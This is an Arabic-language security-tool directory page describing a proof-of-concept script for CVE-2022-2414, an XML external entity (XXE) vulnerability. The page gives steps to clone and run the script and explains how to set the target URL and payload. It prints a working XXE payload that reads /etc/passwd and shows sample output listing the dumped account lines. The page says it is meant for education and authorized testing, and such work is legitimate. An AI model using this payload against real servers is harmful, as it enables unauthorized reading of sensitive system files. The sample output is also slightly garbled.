Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-2414 — هو نص برهان المفهوم لإظهار استغلال ثغرة الكيان الخارجي في XML (XXE) | Kitploit
أدوات/GitHubGitHub/geniuszly/cve-2022-2414
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubgeniuszly/cve-2022-2414

CVE-2022-2414

هو نص برهان المفهوم لإظهار استغلال ثغرة الكيان الخارجي في XML (XXE)

عرض المستودع
32منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

AR

GenXMLExternalEntityExploit هو سكريبت PoC لتوضيح استغلال ثغرة XML External Entity (XXE). يستخدم السكريبت حمولات XML لقراءة ملفات حساسة من الخادم المستهدف. يمكن استخدامه لاختبار الأمان، اختبار الاختراق، أو للأغراض التعليمية.

الميزات

  • يرسل حمولة XML مصممة إلى خادم محدد.
  • يستغل ثغرات XXE لقراءة ملفات الخادم.
  • سهولة تخصيص عنوان URL المستهدف وبيانات الحمولة.

كيفية الاستخدام

  1. استنساخ المستودع
    root@kitploit:~
    git clone https://github.com/geniuszly/CVE-2022-2414
    
  2. الانتقال إلى الدليل
    root@kitploit:~
    cd CVE-2022-2414
    
  3. تشغيل السكريبت تأكد من تثبيت Python على جهازك.
    root@kitploit:~
    python3 GenXMLExternalEntityExploit.py
    

الإعدادات

  • TARGET_URL: قم بتحديث المتغير TARGET_URL في السكريبت ليشير إلى الخادم المستهدف الذي تريد اختباره.
  • XML_PAYLOAD: خصص سلسلة XML_PAYLOAD في السكريبت لمسارات ملفات محددة أو عمليات من جهة الخادم.
  • HEADERS: قم بتعديل رؤوس HTTP حسب الحاجة.

مثال

بشكل افتراضي، يستخدم السكريبت الحمولة التالية لقراءة الملف /etc/passwd:

root@kitploit:~
<!--?xml version="1.0" ?-->
<!DOCTYPE xmlData [<!ENTITY fetchFile SYSTEM "file:///etc/passwd"> ]>
<CertEnrollmentRequest>
  <Attributes/>
  <ProfileID>&fetchFile;</ProfileID>
</CertEnrollmentRequest>

مثال على الإخراج

root@kitploit:~
Инициализация отправки XML-пейлоада на сервер...
Статус-код ответа: 200
Содержимое XML-ответа:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nологin
...

إخلاء مسؤولية

هذه الأداة مخصصة للأغراض التعليمية واختبار الأمان المصرح به فقط. المؤلف غير مسؤول عن أي استخدام غير قانوني لهذه الأداة.

تنزيل الأداة